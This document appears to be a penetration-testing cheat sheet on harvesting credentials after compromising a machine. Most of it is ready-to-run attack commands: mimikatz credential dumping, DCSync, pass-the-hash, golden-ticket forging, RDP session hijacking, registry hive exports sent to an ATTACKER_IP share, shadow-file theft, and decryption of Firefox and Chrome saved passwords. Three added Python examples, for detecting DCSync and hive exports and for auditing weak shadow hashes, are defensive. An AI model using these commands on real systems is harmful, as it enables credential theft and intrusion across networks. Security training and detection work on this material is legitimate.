After compromising a target it is important to collect as many credentials as possible in order to spray them across the network.
Looking for Interesting Files
If the target has a web application that uses a database, try to find the config.php file in order to obtain the database connection credentials.
Check which applications are installed and look for their config files in order to find new pairs of credentials.
Secretsdump
secretsdump is a Python script from impacket that retrieves the same kind of secrets as mimikatz, but remotely.
```bash
impacket-secretsdump corp/Administrador:'passw0rd'@10.10.10.10
```
Mimikatz
It can be used to dump credentials, cached logon credentials, SAM, SYSTEM, LSASS, VAULT, tickets and more. Admin privileges are needed to dump those credentials.
```
.\mimikatz.exe
privilege::debug
sekurlsa::logonpasswords /full
sekurlsa::wdigest
sekurlsa::credman
sekurlsa::ekeys
lsadump::sam
lsadump::lsa /patch
vault::cred /patch
vault::list
ts::mstsc
ts::sessions
```
Or we can use a one-line command:
```powershell
.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords full" "sekurlsa::wdigest" "sekurlsa::credman" "lsadump::sam" "vault::cred" "vault::list" "ts::mstsc" "exit"
```
Note: if sekurlsa::logonpasswords does not work on Windows 10 or Server 2019, download an older release.
Invoke-Mimikatz
The script is useful for running mimikatz from PowerShell without dropping the mimikatz exe to disk. Using the code from ReflectivePEInjection, mimikatz is loaded reflectively into memory. All the functions of mimikatz can be used from this script.
Like mimikatz.exe, the script needs administrative privileges to dump credentials from the local machine.
https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1
```powershell
Invoke-Mimikatz -DumpCreds
```
We can also dump credentials on multiple remote machines:
```powershell
Invoke-Mimikatz -DumpCreds -ComputerName @("machine01","machine02")
```
Invoke-Mimikatz also gives us the opportunity to execute different attacks. Examples:
- DCSync, which is quieter:
```powershell
Invoke-Mimikatz -Command '"lsadump::dcsync /user:corp\Administrator"'
```
- Overpass the Hash:
```powershell
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:<ntlmhash> /run:powershell.exe"'
```
- Crafting a golden ticket:
```powershell
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:corp.local /sid:S-1-5-21-268341927-4156873456-1784235843 /krbtgt:a9b30e5b0dc865eadcea9411e4ade72d /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```
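From the defender's side, a DCSync request shows up on the domain controller as a Security event 4662 whose Properties field carries the replication control-access right GUIDs. The following added example (not from the original notes) flags such events when the requesting principal is not a known domain controller; the account names, the known-DC list and the sample events are constructed assumptions.

```python
import re

# Control-access right GUIDs that directory replication (and therefore DCSync) requires.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_RIGHTS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

GUID_RE = re.compile(r"([0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12})", re.I)

# Assumption: the domain controller computer accounts of the sample domain.
KNOWN_DCS = {"DC01$", "DC02$"}

# Constructed sample: parsed 4662 fields as a SIEM would present them.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC01$", "ObjectType": "domainDNS",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "domainDNS",
     "Properties": f"{{{DS_REPLICATION_GET_CHANGES}}} {{{DS_REPLICATION_GET_CHANGES_ALL}}}"},
    {"EventID": 4662, "SubjectUserName": "jdoe", "ObjectType": "user",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
    {"EventID": 4624, "SubjectUserName": "jdoe"},
]


def replication_rights(properties: str) -> set:
    """Return the replication control-access GUIDs present in a Properties field."""
    return {g.lower() for g in GUID_RE.findall(properties)} & REPLICATION_RIGHTS


def find_dcsync(events, known_dcs=KNOWN_DCS):
    """Return (subject, sorted rights) for 4662 events in which a principal that
    is not a known DC requested replication rights. Legitimate exceptions (for
    example an Azure AD Connect service account) belong in known_dcs."""
    hits = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        rights = replication_rights(ev.get("Properties", ""))
        if rights and ev.get("SubjectUserName") not in known_dcs:
            hits.append((ev["SubjectUserName"], sorted(rights)))
    return hits


if __name__ == "__main__":
    for subject, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {subject}: {', '.join(rights)}")
```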
Hijacking RDP Session
To hijack an RDP session we need mimikatz.
```
.\mimikatz.exe
privilege::debug
ts::sessions
ts::mstsc
token::elevate
ts::remote /id:3
```
SAM and LSA Secrets (Windows)
In Windows environments, passwords are stored as hashes in registry hives.

| Hive | Details | Format |
|---|---|---|
| SAM | Stores locally cached credentials | LM or NT hashes |
| SECURITY | Stores domain cached credentials (LSA secrets) | Plaintext, LM or NT hashes, Kerberos keys (DES, AES), Domain Cached Credentials (DCC1 and DCC2) |
| SYSTEM | Contains enough info to decrypt SAM and LSA secrets | N/A |
You can easily dump the SAM, SECURITY and SYSTEM registry hives with different tools, from Linux and Windows:
Impacket
With impacket-reg.py we can dump the SAM and LSA secrets remotely.
```bash
impacket-smbserver share . -smb2support
impacket-reg DOMAIN/user:pass@IP save -keyName 'HKLM\SAM' -o \\SMBIP\share
impacket-reg DOMAIN/user:pass@IP save -keyName 'HKLM\SYSTEM' -o \\SMBIP\share
impacket-reg DOMAIN/user:pass@IP save -keyName 'HKLM\SECURITY' -o \\SMBIP\share
```
Reg.exe
While Windows is running, the hives are in use and mounted, so we cannot copy the files directly; we need to export them with reg.exe.
```cmd
reg save HKLM\SAM c:\Windows\Temp\sam.save
reg save HKLM\SYSTEM c:\Windows\Temp\system.save
reg save HKLM\SECURITY c:\Windows\Temp\security.save
```
You can also dump them remotely:
```bash
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SAM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SYSTEM' -o '\\ATTACKER_IP\someshare'
reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\ATTACKER_IP\someshare'
```
Finally, on our Kali machine we just need to use samdump2 or impacket-secretsdump to get the hashes.
```bash
samdump2 system.save sam.save > hashes.txt
impacket-secretsdump -sam ./sam.save -system ./system.save -security ./security.save LOCAL
```
CrackMapExec
With crackmapexec we can dump them remotely, like impacket-reg:
```bash
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
crackmapexec smb $TARGETS --kerberos --sam/--lsa
```
Mimikatz
mimikatz is a powerful post-exploitation tool; with it we can extract all secrets, including SAM and LSA:
```
privilege::debug
lsadump::sam
lsadump::sam /sam:'C:\Windows\Temp\sam.save' /system:'C:\Windows\Temp\system.save'
lsadump::secrets
lsadump::secrets /security:'C:\Windows\Temp\security.save' /system:'C:\Windows\Temp\system.save'
```
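Both the hive exports with reg.exe and the mimikatz module calls shown in this section and in the Mimikatz section above leave a process command line in Sysmon Event ID 1 / Security 4688 records. The following added example (not from the original notes) is a small detection pass over such records; the host names, user names and command lines are constructed sample data.

```python
import re

# "reg save HKLM\SAM ..." (any casing, with or without .exe, optional quote before the key).
HIVE_SAVE_RE = re.compile(
    r'\breg(?:\.exe)?\s+save\s+"?hklm\\(sam|system|security)\b', re.I)

# Module prefixes that appear on a command line only with the mimikatz family.
MIMIKATZ_MODULES = ("sekurlsa::", "lsadump::", "kerberos::golden", "vault::cred",
                    "ts::remote", "privilege::debug", "token::elevate")

# Constructed sample records in Sysmon Event ID 1 / Security 4688 style.
SAMPLE_RECORDS = [
    {"Computer": "WS01", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg save HKLM\\SAM c:\\Windows\\Temp\\sam.save"},
    {"Computer": "WS01", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg  save hklm\\system c:\\Windows\\Temp\\system.save"},
    {"Computer": "WS01", "User": "CORP\\jdoe", "Image": "C:\\Windows\\System32\\reg.exe",
     "CommandLine": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion"},
    {"Computer": "WS02", "User": "CORP\\svc", "Image": "C:\\Users\\svc\\m.exe",
     "CommandLine": 'm.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"'},
    {"Computer": "WS02", "User": "CORP\\svc", "Image": "C:\\Windows\\System32\\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def classify(record):
    """Return a list of (rule, detail) findings for one process-creation record."""
    cmd = record.get("CommandLine", "")
    findings = []
    m = HIVE_SAVE_RE.search(cmd)
    if m:
        findings.append(("hive_export", m.group(1).upper()))
    mods = [mod for mod in MIMIKATZ_MODULES if mod in cmd.lower()]
    if mods:
        findings.append(("mimikatz_module", ",".join(mods)))
    return findings


def scan(records):
    """Group findings per (host, user) so a full SAM+SYSTEM+SECURITY export stands out."""
    out = {}
    for rec in records:
        for finding in classify(rec):
            out.setdefault((rec["Computer"], rec["User"]), []).append(finding)
    return out


if __name__ == "__main__":
    for (host, user), findings in scan(SAMPLE_RECORDS).items():
        print(host, user, findings)
```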
PASSWD and SHADOW (Lin)
As on Windows, once we compromise a privileged user such as root we can obtain the system users and password hashes. On Linux we just need to copy the following files to our attacking machine.
```
/etc/passwd
/etc/shadow
```
Finally, on our Kali machine we just need to use unshadow to get the hashes:
```bash
unshadow passwd shadow > hashes.txt
```
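What makes the unshadowed file valuable is how quickly the hashes in it crack, so a defender reviewing /etc/shadow should look for legacy hash formats and empty password fields. The following added example (not from the original notes) performs that audit; the shadow contents and the hash strings in it are constructed placeholders.

```python
# crypt(3) prefix for each hash format as it appears in /etc/shadow; a 13-character
# password field with no "$" prefix is traditional DES.
ALGOS = {"$1$": "md5", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
         "$5$": "sha256", "$6$": "sha512", "$7$": "scrypt", "$y$": "yescrypt"}
WEAK = {"des", "md5"}  # fast to crack once the file has been unshadowed

# Constructed sample shadow file (the hash strings are placeholders, not real digests).
SAMPLE_SHADOW = """\
root:$6$saltsalt$h4shh4shh4sh:19000:0:99999:7:::
legacy:$1$saltsalt$0123456789abcdefghijklm:19000:0:99999:7:::
oldbox:abJnggxhB/yWI:19000:0:99999:7:::
nopass::19000:0:99999:7:::
daemon:*:19000:0:99999:7:::
svc_backup:!$6$saltsalt$h4shh4shh4sh:19000:0:99999:7:::
"""


def classify_hash(field: str):
    """Return (algorithm, locked) for one shadow password field."""
    if field == "":
        return "none", False
    if field.startswith(("!", "*")):
        return "locked", True
    for prefix, name in ALGOS.items():
        if field.startswith(prefix):
            return name, False
    return ("des" if len(field) == 13 else "unknown"), False


def audit_shadow(text: str):
    """Return (user, issue) pairs for entries to fix before an attacker copies
    the file: empty password fields and hashes that crack quickly."""
    issues = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, pw = line.split(":", 2)[:2]
        algo, locked = classify_hash(pw)
        if algo == "none":
            issues.append((user, "empty password field"))
        elif not locked and algo in WEAK | {"unknown"}:
            issues.append((user, f"weak hash ({algo})"))
    return issues


if __name__ == "__main__":
    for user, issue in audit_shadow(SAMPLE_SHADOW):
        print(f"{user}: {issue}")
```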
Mozilla Firefox / Thunderbird / WaterFox / SeaMonkey
Some victims use Mozilla Firefox or Mozilla Thunderbird and store their credentials without protection.
On Windows, look in the following path:
```
C:\Users\VICTIM\AppData\Roaming
```
Zip the contents of the Firefox or Thunderbird folder and transfer it to the attacking machine. Once transferred, we use the firefox_decrypt tool to get the plaintext credentials.
```
$ python firefox_decrypt.py /folder/containing/profiles.ini/
Master Password for profile /tmp/Thunderbird/Profiles/s68bba5j.default:
2021-09-21 19:55:06,811 - WARNING - Attempting decryption with no Master Password
Website: mailbox://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'
Website: smtp://test.local
Username: 'eric'
Password: 'sup3rs3cr3t'
```
Google Chrome
Chrome stores DPAPI-protected credentials in a local SQLite database, which on Windows machines can be found in the AppData directory.
```
C:\> ls C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
Size Type Last Modified Name
---- ---- ------------- ----
40kb fil 02/25/2021 13:21:18 Login Data
```
SharpChromium is a good tool to decrypt these stored credentials.
```
C:\> .\SharpChromium.exe logins
[*] Beginning Google Chrome extraction.
--- Chromium Credential (User: user) ---
URL :
Username : user
Password : Passw0rd!
[*] Finished Google Chrome extraction.
[*] Done.
```